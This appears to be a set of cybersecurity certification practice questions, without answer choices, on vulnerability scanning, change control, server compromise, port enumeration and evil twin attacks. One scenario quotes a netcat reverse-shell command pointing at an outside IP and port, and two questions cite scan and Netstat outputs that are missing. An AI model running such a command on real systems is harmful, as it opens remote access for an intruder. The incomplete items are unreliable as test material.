Which of the following best practices is used to identify areas in the network that may be vulnerable to penetration testing from known external sources?

After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to reserve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented the code from being released into the production environment?

A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

In some of the portal's startup command files, the following command appears:
nc -o /bin/sh 72.14.1.36 4444
Investigating further, the analyst runs Netstat and obtains the following output

Which of the following is the best step for the analyst to take NEXT?

An analyst wants to use a command line tool to identify open ports and running services on a host along with the application that is associated with those services and port. Which of the following should the analyst use?

Various devices are connecting and authenticating to a single evil twin within the network. Which of the following are MOST likely being targeted?